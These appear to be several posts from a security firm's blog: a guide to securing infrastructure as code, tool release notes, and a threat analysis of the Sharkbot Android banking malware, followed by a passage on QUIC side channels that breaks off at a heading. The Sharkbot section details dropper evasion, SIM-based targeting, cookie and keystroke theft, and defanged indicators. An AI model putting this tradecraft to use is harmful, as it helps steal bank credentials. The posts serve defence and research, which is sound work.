When a company is planning to migrate their infrastructure and applications to cloud or want to create a new service, the IT department, Cloud or DevOps team, will have the task for creating the necessary automated infrastructure deployment with keeping security in mind. As security is more and more important, quality should be built in instead of trying to test quality. This is a different way than previously done. There are a lot of moving pieces and possibly many different teams might have to work together. It is difficult to know all the parts of the environment and design all security controls in every step in the deployment or through the automated deployment.

The good news is that there are a lot of information and tools available today for anyone who would like to automatically deploy infrastructure resources with built-in security in the cloud by developing secure infrastructure as a code. This article aims to make an attempt to collect the main starting points, creating a guide on how to integrate security into infrastructure as a code and show how these security checks and gates, tools and procedures secures the infrastructure by mentioning free and/or open-source tools wherever possible.

What is Infrastructure as Code (IaC)?

A nice definition from Kief Morris’s book, Infrastructure as Code Dynamic Systems for the Cloud Age, that infrastructure as code “is an approach to infrastructure automation based on practices from software development. It emphasizes consistent, repeatable routines for provisioning and changing systems and their configuration. You make changes to code, then use automation to test and apply those changes to your systems.” [49]

It comes with benefits such as cost reduction, increased deployment speed, scalability and consistent, reliable configurations, visible governance, security and compliance controls. One paradigm comes with it is immutable infrastructure that basically means no changes are made to the server after deployed. If there is a new version of web server available and needs to be updated, then a new deployment with the new configuration will be deployed. This will make sure the same resources and settings will be deployed every time there is a deployment. The security of the infrastructure is increased by shifting left (early in the development phase) security as much as possible and baked into.

Resources for getting started

Keeping security in mind could not be easier today. There is tremendous information available nowadays on the Internet about how to build something and make it secure. There are freely available documentations, articles, blog posts, conferences, meetups, mailing lists, newsletters [52], discords, online tutorial and educational videos, books, trainings with certifications, benchmarks, frameworks and blueprints by cloud providers and security engineers with best practices.

A good start is the well-architected frameworks released by each main cloud providers (Amazon Web Services (AWS), Azure, Google Cloud Provider (GCP)) and the blueprints for a stack or a service to achieve resilience and security. [1] [2] [3] [4] [5] Frameworks describe the key concepts, design patterns and best practices, while the blueprints are complete, deployable solutions.

Cloud providers also frequently release blog posts on securing services, basic implementations and how their services work. [6] [7] [8]

Some great examples of this include:

  • How to integrate Policy Intelligence recommendations into an IaC pipeline [9]
  • Protecting your GCP infrastructure with Forseti Config Validator part four: Using Terraform Validator [10]
  • How to use CI/CD to deploy and configure AWS security services with Terraform [11],
  • How to create an Azure key vault and vault access policy by using a Resource Manager template [12], [13] [14]

Threat modeling

As a first step after creating a systems’ architecture diagram, but before starting to develop IaC, a threat model in the early stage should be created. Use any of the well-known threat models or frameworks such as STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service and Elevation of Privilege) [15] to understand the threats, possible attack vectors and what necessary security controls need to be in place for prevention. With shifting left the security design and testing as much as possible throughout the lifecycle of infrastructure as code, one can save money on fixing security issues. Building security into in the early stages rather than later will be better as any modification would cost more, like rearchitecting the environment or breaking any parts of the system.

Microsoft has a free and publicly available tutorial about basic threat modeling [47], while the Draw.io [16] and Microsoft Threat Model [17] tools come in handy to draw the threat model and attack trees [18] and put everything in practice [54] [55] [57]. There is a specific tool called Deciduous [19] for creating a more comprehensive and interactive attack tree that could be used together with Sycamore [20] to save, edit and share it.

The Center for Internet Security (CIS) Benchmarks [24] and knowledge bases such as those available from Cloud Conformity [25], BridgeCrew [26] or DataDog [53] could help laying out the security foundation with the security controls that can be mapped to different threats. Using these recommendations with the threat model framework is the initial starting point. This can be extended with cloud specific list of attacks used in real cases like MITRE ATT&CK frameworks [21] and [22] Azure mapping [23].

An interesting case that I would bring your attention to is a 167 pages long threat model release with checklist about AWS S3 [27] that could be a good example to use.

There are videos, presentation slides, blog posts and whitepapers available from security and hacking conferences on the Internet to add more scenarios to the list of attacks and for deeper understanding. There is a hands-on video training showing the attack concepts and tools against multiple cloud providers by Beau Bullock [28], but there are cloud specific resources available such as Rhino Security Lab AWS privilege escalation attack paths [50], NetSPI Azure articles [51] or GCP attacks privilege escalation techniques [29] [30] by Dylan Ayrey, Allison Donovan and Kat Traxler.

Choosing Infra as Code Language

There are a couple of questions that need to be decided when developing infrastructure as code, including:

  • Using declarative (define desired state of infra), imperative (define how to create the infra) or general purpose language (like python)
  • Cloud agnosticism
  • Support of tools and amount of scripting

Multiple options are available to choose from for developing IaC code. If you already know a programming language, then AWS CDK [66] or Pulumi [65] could be a choice. If not, then a language of a provision tool such as Terraform, CloudFormation, ARM or command line tools like AZ PowerShell module, gcloud, aws can be the winner. The good news is that all the IaC tools are supported by linters [46] and static analysers [45] that can be integrated with Integrated Development Editor (IDE) and Continuous Integration & Continuous Deployment (CI/CD) pipelines to continuously check security misconfigurations such as over permissive rules or missing encryption.

Terraform recommends creating and using modules as they help break down the code into smaller units that focuses on specific area, easier to handle and can be reused. There is a registry/repo with already written modules by cloud providers for Terraform, too.

Adding Identity and Access Management (IAM)

When a cloud infrastructure made by multiple services and they are interacting with each other, or a user needs to perform certain administrative task by assuming a role, then they will require IAM policies. They should be created with the least privilege principal using constraints such as resource constraints, condition constraints, access level constraints, because it is very easy to include more permissions that necessary. With great power comes great responsibility. This is very important, because the blast radius will be limited in the case of compromised credentials or a successful attack.

Fortunately, tools exist like I AM ZERO [31] and Policy Sentry [32] that can help in this task to add only those permissions that are absolutely required, hence achieving the least privileges principal. While Cloudsplaining [33] can be used for scanning existing AWS IAM policies for least privileges violations. In addition, there is a special tool called PMapper [34] (developed here at NCC Group!) that can be used for modelling AWS IAM policies and roles to visualise privilege escalation paths by running queries. AWSPX [35] will also help visualize effective access between resources. A similar tool called Pacu [36] will automatically look for and report any well-known roles that can be used in privilege escalation attacks. For Google Cloud, GCP Scanner [76] will show what level of access the credentials have.

In an existing GCP environment the tools called Gcploit [37] and gcphound [73] will be valuable to look for checking privilege escalation paths and automatically exploit these weaknesses, to help understand and validate weaknesses in your systems design. As for Azure, starting from Bloodhound 4.0 version, Azure Active Directory is supported. In addition, cloud providers have their own IAM analyser and suggestion built-in tools that can also show the effective permissions and if it is possible to do an activity or there is a lack of permission. For example, GCP has a built-in service [38] that with time will show you the unnecessary privileges that your role has and has not used for a while. AWS provides AWS IAM Access Analyzer.

CI/CD Pipeline Integration

In order to avoid repeating all the steps with our code manually every time there is a modification, Continuous Integration & Continuous Deployment Pipeline (CI/CD) pipeline integration will come in handy and solves this problem by helping in automate the steps. DevOps best practices can be integrated into the pipeline such as using Version Control System (VCS), pair review, SAST too will enhance a faster, automated deployment with baked in security. Pushing code into a VCS will enable backup and roll back option. Requiring pair review means the code will be checked by someone else before the new code is merged into the existing code and can be automated with policy as code checks. Running a Static Application Security Testing (SAST) tool will automatically check and report security issues in the code. SAST tools such as Checkov [39], Regula [40], Semgrep [41], tfscan [42], kics [48], tfsec [43], tfsec for Visual Studio Plugin and other linters can scan through the code while it is developed, before it is committed or merged, before and after it is deployed. Basically from the moment the code was typed until it is deployed and running, a range of security issues can be automatically checked and prevented.

Policy as Code

There should be an automated way to ensure that next time if someone updates the infrastructure code or creates new one, there will be no bad examples or misconfigurations introduced and instead best practices are followed. This would also remove some of the burden that comes from pair reviewing code. This automated way is what is known as Policy as Code, that is representing and managing policies as code to automatically enforce best practices and company wide controls. Azure has built-in policy as code and governance services with Azure Policy [64], Initiatives and Blueprints. There are two specific tools exists for AWS CloudFormation, they called cfn_nag [60] and AWS CloudFormation Guard [61]. GCP offers [62] Organizational Policy similarly like AWS Service Control Policy [63], but they live in the cloud providers space and cannot be integrated into the CI/CD pipeline.

There are open-source tools such as Open Policy Agent (OPA) [44] or Regula [40] that can be integrated into the CI/CD pipeline and can be run periodically to looking for any drifts.

Additional best practices such as using modules, naming convention and enforcing tags can further improve visibility, traceability and cost optimization.

Configuration Management

Although this part is not necessarily in scope, it is connected very closely and the next step. It should be noted that IaC will not include a configured software or application laying on top of some infrastructure, it will just provide the underlying infrastructure. Everything that comes after the base infrastructure deployment is finished, will be handed over and taken care by configuration management tools such as ansible [77], chef [78], puppet [79]. They will help automating the configuration settings from the above mentioned benchmarks and best practices. There are tools for configuration management settings review as well: InSpec [80], Serverspec [81], terratest [82].

Visualizing Infrastructure

Although the infrastructure is up and running, we are not finished yet. Visualizing the running cloud environment will help with the inventory, can be compared with the architect diagram for differences and can be used for further improving the threat model. This will help understanding and showing any gaps or missing threats in the existing environment and further polishing the initial threat model.

In case of Azure Resource Manager (ARM), there are Resource Visualiser [71] and ARMViz [72] tools available where the first one allows exporting the infrastructure. Google has Network Topology [70] and Google Architecture Diagram Tool [69]. AWS offers Neptune [67] for running infra and Perspective [68] which is more of an architecture diagram tool. Independent tools such as cdk-dia [83], cfn-diagram [84], cloudmapper [85] are able to create a diagram from the resources in the cloud environment, but they are static, point in time diagrams. On the other side, Fugue developer for cloud [86] connects to the environment and periodically reads and updates the diagram and warns about any misconfigurations.

Monitoring and Drift Control

Life does not stop here, because in case of an incident or problem, an emergency manual change can be introduced and worsen the security posture, especially if forgotten. Cloud monitoring, security posture management and drift control will help in these situations at the post deployment stage. Monitoring can be happening at cloud resource or configuration level as well. Tools work based on tags, completely scanning all the resources in the cloud environment, or scanning the state file of tools like Terraform. Rerunning tools could also show the differences between the deployed and original state and can be reapplied, but without automation, it’s less of an option. At cloud resource level driftctl [87] will come in handy, while for the actual configuration drift monitoring can be taken care by InSpec [80], Serverspec [81], terratest [82]. Resources deployed via Azure Blueprints could automatically remediate the modified resources back to the original layout. When the cloud environment reaches a certain point, Cloud Security Posture Management (CSPM) tools such as OPENCSPM [74] or magpie [75] could be the next step as they bring things into another level. They include resource inventory, custom and industry policies, security checks, risk tracking and monitoring under one tool for a multi cloud environment.

Evolving the Maturity of your IaC

You can systematically evolve the infrastructure and quantify the maturity with Infrastructure as a code Maturity model. Gary Stafford gave a talk about infrastructure as code maturity model [56] with and the following levels:

  • Level -1 Regressive: Process is unrepeatable, poorly controlled, and reactive.
  • Level 0 Repeatable: Process is documented and partly automated.
  • Level 1 Consistent: Process is automated and applied across the whole lifecycle.
  • Level 2 Quantitatively Managed: Process is measured and controlled.
  • Level 3 Optimizing: Process is optimized.

With fast, continuous automated infrastructure deployment the change management process needs to take a different approach. Scheduling change requests and writing detailed recovery plan will lose the time and speed advantage that IaC offers. The roll back option is coming from the previously working, battle tested version from the version control system. The changes need to be small with affecting a smaller scope. The modification and the modifying person can be traced back from the version control system and their commit messages while the automated security tests enforce the security baseline. Kief in his book [49] mentions two patterns for change management: continuous synchronization or immutable server change management pattern. In the first case there is a continuous apply and overwrite any differences, while the latter means complete rebuild with a change.

Further traceability sources include change history, cloud audit logs, applied tags on resources, version control system commits with signing, CI/CD pipeline jobs history and monitoring tools. Branch protection with status checks and with required signature can also improve traceability and enforce policies.

As everything is a codebase which is easy to read and interpret, with the addition of version control system commits and notes, it will also act as a documentation extending and backing up the architecture documentation by giving context and deeper understanding of choices and strategies.

It is very important to track resources and have an up-to-date inventory, because you cannot defend the environment if you do not know what resources it contains. Inventory of the resources will be provided by the code, state files, cloud providers’ dashboards, monitoring systems, visualized via diagrams and can be viewed by tags, naming conventions and project hierarchies.

Backup of the code is ensured by the multiple versions stored in the version control system. As the infrastructure is automatically deployed and idempotent and/or immutable, only the configuration settings and data require backup.

In case of time or knowledge limitation or just to get insurance from an independent party, security assessment done by third-party companies could help by showing any missed spot or show a clean sheet. This is an optional step, but it can provide confirmation and independent review on the whole picture.

The Big Picture

As a picture worth thousand words, here you can see the big picture of the already discussed points.

Figure 1- The lifecycle of Infra as Code and security

Figure 2- Continuous Security within the lifecycle

Summary

The infrastructure that was deployed have gone through multiple security checks and approves, in compliant with company security best practices, governing policies and can be traced back who, what and when introduced into the code that had been deployed. As far as one can see after going through all the parts of developing the IaC to automatically deploy a secure infrastructure in the cloud, there is no doubt about how many places things can go wrong. If somebody dedicates themselves using IaC and rigorously execute the steps in an automated way, substantial benefits in terms of visibility and traceability can be obtained, with fast, repeatable, and secure infrastructure deployment.

References

[1] https://aws.amazon.com/architecture/well-architected/?wa-lens-whitepapers.sort-by=item.additionalFields.sortDate&wa-lens-whitepapers.sort-order=desc

[2] https://cloud.google.com/security/best-practices

[3] https://docs.microsoft.com/en-us/azure/architecture/framework/

[4] https://docs.microsoft.com/en-us/azure/architecture/guide/design-principles/

[5] https://docs.microsoft.com/en-us/azure/architecture/guide/

[6] https://aws.amazon.com/blogs/

[7] https://azure.microsoft.com/en-us/blog/

[8] https://cloud.google.com/blog/

[9] https://cloud.google.com/blog/products/devops-sre/how-to-integrate-policy-intelligence-recommendations-into-an-iac-pipeline

[10] https://cloud.google.com/blog/products/identity-security/using-forseti-config-validator-with-terraform-validator

[11] https://aws.amazon.com/blogs/security/how-use-ci-cd-deploy-configure-aws-security-services-terraform/

[12] https://docs.microsoft.com/en-us/azure/key-vault/general/vault-create-template?tabs=CLI

[13] https://azure.microsoft.com/en-us/blog/topics/security/

[14] https://aws.amazon.com/blogs/security/

[15] https://docs.microsoft.com/en-us/previous-versions/commerce-server/ee823878(v=cs.20)?redirectedfrom=MSDN

[16] https://www.diagrams.net/

[17] https://www.microsoft.com/en-us/securityengineering/sdl/threatmodeling

[18] https://github.com/michenriksen/drawio-threatmodeling

[19] https://swagitda.com/blog/posts/deciduous-attack-tree-app/

[20] https://github.com/raesene/sycamore

[21] https://attack.mitre.org/matrices/enterprise/cloud/

[22] https://attack.mitre.org/

[23] https://center-for-threat-informed-defense.github.io/security-stack-mappings/Azure/README.html

[24] https://www.cisecurity.org/benchmark/amazon_web_services/

[25] https://www.trendmicro.com/cloudoneconformity/

[26] https://docs.bridgecrew.io/docs/aws-policy-index

[27] https://trustoncloud.com/the-last-s3-security-document-that-well-ever-need/

[28] https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/

[29] https://www.youtube.com/watch?v=Ml09R38jpok

[30] https://www.youtube.com/watch?v=dRVFoyQxRiU

[31] https://github.com/common-fate/iamzero

[32] https://github.com/salesforce/policy_sentry

[33] https://github.com/salesforce/cloudsplaining

[34] https://github.com/nccgroup/PMapper

[35] https://github.com/FSecureLABS/awspx

[36] https://github.com/RhinoSecurityLabs/pacu

[37] https://github.com/dxa4481/gcploit

[38] https://cloud.google.com/iam/docs/recommender-overview

[39] https://github.com/bridgecrewio/checkov

[40] https://github.com/fugue/regula

[41] https://github.com/returntocorp/semgrep

[42] https://github.com/wils0ns/tfscan

[43] https://github.com/aquasecurity/tfsec

[44] https://github.com/open-policy-agent/opa

[45] https://marketplace.visualstudio.com/items?itemName=tfsec.tfsec

[46] https://github.com/terraform-linters/tflint

[47] https://docs.microsoft.com/en-us/learn/paths/tm-threat-modeling-fundamentals/

[48] https://github.com/Checkmarx/kics

[49] Kief Morris , O’Reilly: Infrastructure as Code -Dynamic Systens for the Cloud Age, https://www.oreilly.com/library/view/infrastructure-as-code/9781098114664/

[50] https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

[51] https://www.netspi.com/blog/technical/cloud-penetration-testing/

[52] https://cloudseclist.com/

[53] https://docs.datadoghq.com/security_platform/default_rules/#cat-posture-management-cloud

[54] https://www.youtube.com/watch?v=5jyL-CHib54

[55] https://www.youtube.com/watch?v=DEVt1Adybvs

[56] https://www.slideshare.net/garystafford/infrastructure-as-code-maturity-model

[57] https://www.youtube.com/watch?v=VbW-X0j35gw

[60] https://stelligent.com/2018/03/23/validating-aws-cloudformation-templates-with-cfn_nag-and-mu/

[61] https://github.com/aws-cloudformation/cloudformation-guard

[62] https://cloud.google.com/resource-manager/docs/organization-policy/overview

[63] https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps.html

[64] https://docs.microsoft.com/en-us/azure/governance/policy/overview

[65] https://www.pulumi.com/

[66] https://aws.amazon.com/cdk/

[67] https://aws.amazon.com/blogs/database/visualize-your-aws-infrastructure-with-amazon-neptune-and-aws-config/

[68] https://aws.amazon.com/solutions/implementations/aws-perspective/

[69] https://cloud.google.com/blog/topics/developers-practitioners/introducing-google-cloud-architecture-diagramming-tool

[70] https://cloud.google.com/network-intelligence-center/docs/network-topology/concepts/overview

[71] https://blog.hametbenoit.info/2020/04/29/azure-you-can-now-visualize-your-azure-resources-when-exporting-as-a-template/

[72] https://zimmergren.net/visualize-your-templates-with-the-azure-arm-template-viewer-extension-for-vs-code/

[73] https://desi-jarvis.medium.com/gcphound-a-swiss-army-knife-offensive-toolkit-for-google-cloud-platform-gcp-fb9e18b959b4

[74] https://github.com/OpenCSPM/opencspm

[75] https://www.openraven.com/research-tools/magpie

[76] https://github.com/google/gcp_scanner

[77] https://www.ansible.com/
[78] https://www.chef.io/
[79] https://puppet.com/
[80] https://docs.chef.io/inspec/

[81] https://serverspec.org/

[82] https://terratest.gruntwork.io/
[83] https://github.com/pistazie/cdk-dia

[84] https://github.com/mhlabs/cfn-diagram

[85] https://github.com/duo-labs/cloudmapper

[86] https://www.fugue.co/blog/fugue-developer-free-cloud-security-and-visualization-for-engineers
[87] https://driftctl.com/

Tool Release – ScoutSuite 5.12.0

13 September 2022 at 17:32

We are excited to announce the release of a new version of our open-source, multi-cloud auditing tool ScoutSuite (on Github)!

This version includes multiple bug fixes, dependency updates and feature enhancements for AWS, Azure and GCP. It also adds and updates several rules for these three cloud providers, alongside improved finding templates and descriptions.

The most significant changes are:

  • Core
    • Updated dependencies
    • Updated cli parser
  • AWS
    • Multiple bug fixes and minor improvements
    • Updated IP ranges
    • Updated rules for CloudFront
    • Updated rules for EC2
    • Updated rules for ELB
    • Updated rules for IAM
    • Updated rule for S3
    • Updated rule for SQS
    • Updated error logging and exception handling
    • Improved secrets detection rules
    • Added a new command flag that allows to run Scout on CN regions
  • Azure
    • Upgraded authentication strategies to use latest Azure SDK packages
    • Multiple bug fixes and minor improvements
    • Added new rules for Azure AD
    • Added and updated rules for Azure Storage Account
    • Added and updated rules for Networking
    • Updated rule for Virtual Machines
    • Added new rules for RBAC
    • Added and updated rules for Azure SQL Databases, MySQL and PostgreSQL
    • Added new rules for Logging and Monitoring
    • Added and updated rules for Azure Security Center (now Defender for Cloud)
    • Added and updated rules for AppService
    • Added new rule for KeyVault
    • Updated multiple finding templates
  • GCP
    • Multiple bug fixes and minor improvements
    • Added new rules for GKE
    • Added and updated rules for CloudSQL
    • Added new rules for BigQuery
    • Added new rules for Functions
    • Added new rule for CloudStorage
    • Updated rule for MemoryStore
    • Updated multiple finding templates
    • Updated UI
  • Docker
    • Fixed error in docker_compose.yaml

Check out the Github page and the Wiki documentation for more information about ScoutSuite.

For those wanting a Software-as-a-Service version, we also offer NCC Scout. This service includes persistent monitoring, as well as coverage of additional services across the three major public cloud platforms. If you would like to hear more, reach out to [email protected] or visit our cyberstore!

We would like to express our gratitude thank all our contributors:

@xnkevinnguyen
@x4v13r64
@SophieDorval
@rscottbailey
@yash-seclogic
@charlietran
@tkmru
@Anthirian

Public Report – Penumbra Labs Decaf377 Implementation and Poseidon Parameter Selection Review

12 September 2022 at 20:13

During the summer of 2022, Penumbra Labs, Inc. engaged NCC Group to conduct a cryptographic security assessment of two items: (i) the specification and two implementations of the decaf377 group, and (ii) a methodology and implementation of parameter generation for the Poseidon hash function.

Decaf377 is a prime-order group obtained by applying the Decaf construction to a given twisted Edwards curve defined over the scalar field of the BLS12-377 curve, thus providing a simpler abstraction than the curve itself by eliminating the curve’s cofactor.

Poseidon is a hash function that works natively over values in a prime field and that can be expressed compactly in arithmetic circuits.

The Public Report for this review may be downloaded below:

Tool Release – Monkey365

7 September 2022 at 18:27

by Juan Garrido

Editor’s note: This tool was originally released at Black Hat USA 2022 (Arsenal) in August 2022, and was created by Juan Garrido (GitHub: @silverhack, Twitter: @tr1ana).

Monkey 365 is an Open Source security tool that can be used to easily conduct not only Microsoft 365, but also Azure subscriptions and Azure Active Directory security configuration reviews without the significant overhead of learning tool APIs or complex admin panels from the start. To help with this effort, Monkey365 also provides several ways to identify security gaps in the desired tenant setup and configuration. Monkey 365 provides valuable recommendations on how to best configure those settings to get the most out of your Microsoft 365 tenant or Azure subscription.

Introduction

Monkey 365 is a plugin-based PowerShell module that can be used to review the security posture of your cloud environment. With Monkey 365 you can scan for potential misconfigurations and security issues in public cloud accounts according to security best practices and compliance standards, across Azure, Azure AD, and Microsoft 365 core applications.

Installation

You can either download the latest zip by clicking this link or download Monkey 365 by cloning the repository:

Once downloaded, you must extract the file and extract the files to a suitable directory. Once you have unzipped the zip file, you can use the PowerShell V3 Unblock-File cmdlet to unblock files:

Get-ChildItem -Recurse c:\monkey365 | Unblock-File

Once you have installed the monkey365 module on your system, you will likely want to import the module with the Import-Module cmdlet. Assuming that monkey365 is located in the PSModulePath, PowerShell would load monkey365 into active memory:

Import-Module monkey365

If monkey365 is not located on a PSModulePath path, you can use an explicit path to import:

Import-Module C:\temp\monkey365

You can also use the Force parameter in case you want to reimport the monkey365 module into the same session

Import-Module C:\temp\monkey365 -Force

Basic Usage

The following command will provide the list of available command line options:

Get-Help Invoke-Monkey365

To get a list of examples use:

Get-Help Invoke-Monkey365 -Examples

To get a list of all options and examples with detailed info use:

Get-Help Invoke-Monkey365 -Detailed

The following example will retrieve data and metadata from Azure AD and SharePoint Online and then print results. If credentials are not supplied, Monkey365 will prompt for credentials.

$param = @{
    Instance = 'Office365';
    Analysis = 'SharePointOnline';
    PromptBehavior = 'SelectAccount';
    IncludeAzureActiveDirectory = $true;
    ExportTo = 'PRINT';
}
$assets = Invoke-Monkey365 @param

Additional information such as Installation or advanced usage can be found in the following link

Sharkbot is back in Google Play 

6 September 2022 at 18:32

Authored by Alberto Segura (main author) and Mike Stokkel (co-author)

Editor’s note: This post was originally published on the Fox-IT blog.

Introduction 

After we discovered in February 2022 the SharkBotDropper in Google Play posing as a fake Android antivirus and cleaner, now we have detected a new version of this dropper active in the Google Play and dropping a new version of Sharkbot. 

This new dropper doesn’t rely Accessibility permissions to automatically perform the installation of the dropper Sharkbot malware. Instead, this new version ask the victim to install the malware as a fake update for the antivirus to stay protected against threats. 

We have found two SharkbotDopper apps active in Google Play Store, with 10K and 50K installs each of them. 

The Google Play droppers are downloading the full featured Sharkbot V2, discovered some time ago by ThreatFabric. On the 16th of August 2022, Fox-IT’s Threat Intelligence team observed new command-and-control servers (C2s), that were providing a list of targets including banks outside of United Kingdom and Italy. The new targeted countries in those C2s were: Spain, Australia, Poland, Germany, United States of America and Austria. 

On the 22nd of August 2022, Fox-IT’s Threat Intelligence team found a new Sharkbot sample with version 2.25; communicating with command-and-control servers mentioned previously. This Sharkbot version introduced a new feature to steal session cookies from the victims that logs into their bank account. 

The new SharkbotDropper in Google Play 

In the previous versions of SharkbotDropper, the dropper was abusing accessibility permissions in order to install automatically the dropper malware. To do this, the dropper made a request to its command-and-control server, which provided an URL to download the full featured Sharkbot malware and a list of steps to automatically install the malware, as we can see in the following image. 

Abusing the accessibility permissions, the dropper was able to automatically click all the buttons shown in the UI to install Sharkbot. But this not the case in this new version of the dropper for Sharkbot. The dropper instead will make a request to the C2 server to directly receive the APK file of Sharkbot. It won’t receive a download link alongside the steps to install the malware using the ‘Automatic Transfer Systems’ (ATS) features, which it normally did. 

In order to make this request, the dropper uses the following code, in which it prepares the POST request body with a JSON object containing information about the infection. The body of the request is encrypted using RC4 and a hard coded key. 

In order to complete the installation on the infected device, the dropper will ask the user to install this APK as an update for the fake antivirus. Which results in the malware starting an Android Intent to install the fake update. 

This way, the new version of the Sharkbot dropper is now installing the payload in a non automatic way, which makes it more difficult to get installed – since it depends on the user interaction to be installed -, but it is now more difficult to detect before being published in Google Play Store, since it doesn’t need the accessibility permissions which are always suspicious. 

Besides this, the dropper has also removed the ‘Direct Reply’ feature, used to automatically reply to the received notifications on the infected device. This is another feature which needs suspicious permissions, and which once removed makes it more difficult to detect. 

To make detection of the dropper by Google’s review team even harder, the malware contains a basic configuration hard coded and encrypted using RC4, as we can see in the following image. 

The decrypted configuration, as we can see in the following image, contains the list of targeted applications, the C2 domain and the countries targeted by the campaign (in this example UK and Italy). 

If we look carefully at the code used to check the installed apps against the targeted apps, we can realize that it first makes another check in the first lines: 

String lowerCase = ((TelephonyManager) App.f7282a.getSystemService("phone")).getSimCountryIso().toLowerCase(); 
    if (!lowerCase.isEmpty() && this.f.getString(0).contains(lowerCase)) 

 

Besides having at least one of the targeted apps installed in the device, the SharkbotDropper is checking if the SIM provider’s country code is one of the ones included in the configuration – in this campaign it must be GB or IT. If it matches and the device has installed any of the targeted apps, then the dropper can request the full malware download from the C2 server. This way, it is much more difficult to check if the app is dropping something malicious. But this is not the only way to make sure only targeted users are infected, the app published in Google Play is only available to install in United Kingdom and Italy. 

After the dropper installs the actual Sharkbot v2 malware, it’s time for the malware to ask for accessibility permissions to start stealing victim’s information. 

Sharkbot 2.25-2.26: New features to steal cookies 

The Sharkbot malware keeps the usual information stealing features we introduced in our first post about Sharkbot: 

  • Injections (overlay attacks): this feature allows Sharkbot to steal credentials by showing a fake website (phishing) inside a WebView. It is shown as soon as the malware detects one of the banking application has been opened. 
  • Keylogging: this feature allows Sharkbot to receive every accessibility event produced in the infected device, this way, it can log events such as button clicks, changes in TextFields, etc, and finally send them to the C2. 
  • Remote control/ATS: this feature allows Sharkbot to simulate accessibility events such as button clicks, physical button presses, TextField changes, etc. It is used to automatically make financial transactions using the victim’s device, this way the threat actors don’t need to log in to the stolen bank account, bypassing a lot of the security measures. 

Those features were present in Sharkbot 1, but also in Sharkbot 2, which didn’t change too much related to the implemented features to steal information. As ThreatFabric pointed out in their tweet, Sharkbot 2, which was detected in May 2022, is a code refactor of the malware and introduces a few changes related to the C2 Domain Generation Algorithm (DGA) and the protocol used to communicate with the server. 

Version 2 introduced a new DGA, with new TLDs and new code, since it now uses MD5 to generate the domain name instead of Base64. 

We have not observed any big changes until version 2.25, in which the developers of Sharkbot have introduced a new and interesting feature: Cookie Stealing or Cookie logger. This new feature allows Sharkbot to receive an URL and an User-Agent value – using a new command ‘logsCookie’ -, these will be used to open a WebView loading this URL – using the received User-Agent as header – as we can see in the following images of the code. 

Once the victim logged in to his bank account, the malware will receive the PageFinished event and will get the cookies of the website loaded inside the malicious WebView, to finally send them to the C2. 

New campaigns in new countries 

During our research, we observed that the newer C2 servers are providing new targeted applications in Sharkbot’s configuration. The list of targeted countries has grown including Spain, Australia, Poland, Germany, United States of America and Austria. But the interesting thing is the new targeted applications are not targeted using the typical webinjections, instead, they are targeted using the keylogging – grabber – features. This way, the malware is stealing information from the text showed inside the official app. As we can see in the following image, the focus seems to be getting the account balance and, in some cases, the password, by reading the content of specific TextFields. 

Also, for some of the targeted applications, the malware is providing within the configuration a list of ATS configurations used to avoid the log in based on fingerprint, which should allow to show the usual username and password form. This allows the malware to steal the credentials using the previously mentioned ‘keylogging’ features, since log in via fingerprint should ask for credentials. 

Conclusion 

Since we published our first blog post about Sharkbot in March 2022, in which we detected the SharkbotDropper campaigns within Google Play Store, the developers have been working hard to improve their malware and the dropper. In May, ThreatFabric found a new version of Sharkbot, the version 2.0 of Sharkbot that was a refactor of the source code, included some changes in the communication protocol and in the DGA. 

Until now, Sharkbot’s developers seem to have been focusing on the dropper in order to keep using Google Play Store to distribute their malware in the latest campaigns. These latest campaigns still use fake antivirus and Android cleaners to install the dropper from the Google Play. 

With all these the changes and new features, we are expecting to see more campaigns, targeted applications, targeted countries and changes in Sharkbot this year.

 

Indicators of compromise 

SharkbotDropper samples published in Google Play: 

  • hxxps://play.google[.]com/store/apps/details?id=com.kylhavy.antivirus 
  • hxxps://play.google[.]com/store/apps/details?id=com.mbkristine8.cleanmaster 

Dropper Command-and-control (C2): 

  • hxxp://mefika[.]me/ 

Sharkbot 2.25 (introducing new Cookie stealing features): 

  • Hash: 7f2248f5de8a74b3d1c48be0db574b1c6558d6edae347592b29dc5234337a5ff 
  • C2: hxxp://browntrawler[.]store/ (185.212.47[.]113

Sharkbot v2.26 sample: 

  • Hash: 870747141b1a2afcd76b4c6482ce0c3c21480ae3700d9cb9dd318aed0f963c58 
  • C2: hxxp://browntrawler[.]store/ (185.212.47[.]113

DGA Active C2s: 

  • 23080420d0d93913[.]live (185.212.47[.]113) 
  • 7f3e61be7bb7363d[.]live (185.212.47[.]113) 

Constant-Time Data Processing At a Secret Offset, Privacy and QUIC

5 September 2022 at 13:00

Introduction

NCC Group Cryptography Services team assessed security aspects of several implementations of the QUIC protocol. During the course of their reviews, the team found a number of recurrent cryptography side channel findings of arguably negligible privacy risk to users, across these implementations. However, repetition in itself makes these findings somehow worth having a deeper look, as it may indicate design issues, including complexity of implementing security controls, and/or potential misunderstandings. In this blog post, we will focus on explaining timing side channels that may arise from processing data that starts at a secret offset, and potential remediation. We then offer a full Rust implementation of the constant-time proof of concept code, and an extra proof of concept implementation of constant-time data processing at a secret offset in the Common Lisp, a general-purpose, multi-paradigm programming language. For a primer on constant-time cryptography, first read the excellent BearSSL “Why Constant-Time Crypto?” article.

QUIC Protocol Privacy Controls

The QUIC protocol describes and mandates privacy preserving or enhancing controls throughout RFC 9000 “QUIC: A UDP-Based Multiplexed and Secure Transport”, and RFC 9001 “Using TLS to Secure QUIC”.

Of interest for the purpose of this blog post, the former standard document explains that an endpoint that moves between networks may not wish to have their activity correlated by any entity other than their peer. It provides a number of security controls to protect against activity correlation, including but not limited to header protection. In section 9.5, the standard states that “Header protection ensures that packet numbers cannot be used to correlate activity“, noting further that “This does not prevent other properties of packets, such as timing and size, from being used to correlate activity.

The latter standard document describes some of the requirements in adding and removing header protection:

For authentication to be free from side channels, the entire process of header protection removal, packet number recovery, and packet protection removal MUST be applied together without timing and other side channels.

For the sending of packets, construction and protection of packet payloads and packet numbers MUST be free from side channels that would reveal the packet number or its encoded size.

The packet number is used as input to the AEAD nonce in the encryption, and decryption of QUIC data. The designers considered the “Nonces are Noticed: AEAD Revisited” paper, and QUIC provides nonce privacy.

Timing Side Channels

